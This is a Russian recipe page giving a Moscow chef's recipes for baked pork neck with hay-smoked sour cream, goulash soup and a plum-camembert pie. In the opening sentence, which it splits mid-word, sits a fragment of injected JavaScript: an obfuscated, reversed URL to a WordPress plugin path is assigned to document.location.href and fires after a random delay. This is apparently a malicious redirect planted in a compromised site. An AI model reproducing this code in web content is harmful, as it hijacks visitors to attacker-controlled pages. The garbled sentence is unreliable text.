3 рецепта для очень сытного и очень вкусного обеда от московского шеф-повара

Только от одного вида этих блюд уже текут слюнки! Шеф-повар ресторана «Пирог мясника» Александр Семыкин специально для читателей fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru поделился рецептами запечённой свиной шеи, супа-гуляша и пирога с пряной сливой.

1020 calories

Свиная шея с печёным картофелем и аджикой

Для приготовления этого блюда вам понадобится сено. Да-да, вы не ослышались.

Изображение рецепта Свиная шея с печёным картофелем и аджикой

Свиная шея с печёным картофелем и аджикой

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

100 минут

PT1H40M

PT1H40M

КОЛИЧЕСТВО ПОРЦИЙ:

2 порции

КАЛОРИЙНОСТЬ:

1020 ккал

Сложность

Время

100 минут

Кол-во порций

2 порции

Калорийность

1020 ккал

Ингредиенты

Свинина (шейка)

600 г

Лук (репчатый)

1 шт.

Базилик

по вкусу

Соль

по вкусу

Перец (чёрный молотый)

по вкусу

Кориандр

1 щепотка

Специи (сумах)

1 щепотка

Специи (паприка)

1 щепотка

Орегано

1 щепотка

Картофель

300 г

Сметана

100 г

Аджика

100 г

Киви

10 г

Процесс приготовления

  1. Свиную шею разрежьте на два одинаковых куска. Лук, базилик и киви мелко нарежьте и отожмите сок. Смажьте мясо соком, посолите, поперчите и добавьте остальные специи по вкусу. Затем положите нарезанные лук, базилик и киви в тару с мясом, накройте её пищевой плёнкой. Мясу нужно дать настояться 40 минут при комнатной температуре.
  2. Для приготовления копчёной сметаны понадобится большая кастрюля и две металлические миски. На дно кастрюли положите сено (можно использовать сено для кормления кроликов). Поверх сена поставьте миску со льдом. На миску со льдом — тарелку со сметаной. Подожгите сено, накройте кастрюлю крышкой и коптите в течение 10 минут.
  3. Вымойте тщательно картофель. Раскалите сковороду (масло не рекомендуется использовать) и обжарьте мясо до золотистой корочки с двух сторон.
  4. Свинину и картофель (неочищенный) запекайте в разогретой до 190 градусов духовке в течение 12—15 минут.
  5. Готовую свинину и картофель выложите на блюдо. Украсьте аджикой и подкопчённой сметаной. Мясо рекомендуется есть с аджикой, а картофель — со сметаной. Приятного аппетита!

220 calories

Суп-гуляш

Для приготовления супа выберите либо спинно-поясничную часть, либо говяжью вырезку.

Изображение рецепта Суп-гуляш

Суп-гуляш

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

120 минут

PT2H

PT2H

КОЛИЧЕСТВО ПОРЦИЙ:

3 порции

КАЛОРИЙНОСТЬ:

220 ккал

Сложность

Время

120 минут

Кол-во порций

3 порции

Калорийность

220 ккал

Ингредиенты

Лук

100 г

Говядина

160 г

Болгарский перец

150 г

Соль

по вкусу

Перец (чёрный молотый)

по вкусу

Бульон (говяжий)

250 мл

Кинза

по вкусу

Петрушка

по вкусу

Томаты (пюре)

100 г

Специи (паприка)

1 щепотка

Чеснок

15 г

Масло (растительное)

по вкусу

Процесс приготовления

  1. Мелко нашинкуйте лук и болгарский перец, говядину нарежьте средними кубиками.
  2. На растительном масле обжарьте вначале лук до золотистого цвета, далее отдельно перец и говядину.
  3. Мясо залейте бульоном и томите полтора-два часа, пока говядина не станет мягкой.
  4. Положите лук и перец в миску и добавьте томатное пюре, всё перемешайте. Получившийся соус нагрейте и добавьте специи по вкусу.
  5. В бульон с готовой говядиной добавьте соус, перемешайте и доведите до кипения. Затем добавьте соль, чёрный молотый перец по вкусу и мелко нарезанную зелень.
  6. Готовый суп-гуляш разлейте по тарелкам. При подаче можно украсить суп кинзой. Приятного аппетита!

980 calories

Пирог со сливой и камамбером

Пряное блюдо со сливами, посыпанное сыром камамбер.

Изображение рецепта Пирог со сливой и камамбером

Пирог со сливой и камамбером

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

45 минут

КОЛИЧЕСТВО ПОРЦИЙ:

3 порции

КАЛОРИЙНОСТЬ:

980 ккал

Сложность

Время

45 минут

Кол-во порций

3 порции

Калорийность

980 ккал

Ингредиенты

Сливы (свежие)

1 кг

Мука

150 г

Сахар (коричневый)

500 г

Кардамон

по вкусу

Корица (палочка)

1 шт.

Тимьян

по вкусу

Перец (чили)

по вкусу

Сыр (камамбер)

100 г

Масло (сливочное)

70 г

Яйца

1 шт.

Яйца (желток)

1 шт.

Процесс приготовления

  1. Вначале замесите тесто. Заранее достаньте из холодильника сливочное масло, чтобы оно разморозилось. Добавьте подтаявшее сливочное масло в муку и размешайте до состояния песка. Затем добавьте 100 г сахара и яичный желток, размешайте до однородного состояния. Если масса не будет склеиваться, добавьте воды.
  2. Вымойте сливу и отделите мякоть от косточки, стараясь разделить её на половинки. Нагрейте большую сковороду, высыпьте туда сахар и растопите его на медленном огне. Как только сахар растопится, выложите на сковороду сливу и карамелизируйте её. Добавьте пряности по вкусу, не перемешивая. Когда излишняя влага начнёт испаряться, аккуратно перемешайте деревянной лопаткой и снимайте с огня.
  3. Тесто выложите в форму для выпекания и равномерно распределите. Запекайте в духовке при температуре 180 градусов в течение 7 минут. Затем сверху добавьте карамелизированную сливу и посыпьте нарезанным сыром камамбер. Запекайте в духовке при температуре 190 градусов ещё 7—10 минут. Приятного аппетита!

Статьи по теме

Средиземноморская кухня: 3 рецепта на завтрак, обед и ужин

3 мясных блюда, которые можно есть на завтрак, обед и ужин

Как приготовить полезный обед за 3 секунды

Обед в лаваше: учимся крутить полезные роллы

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector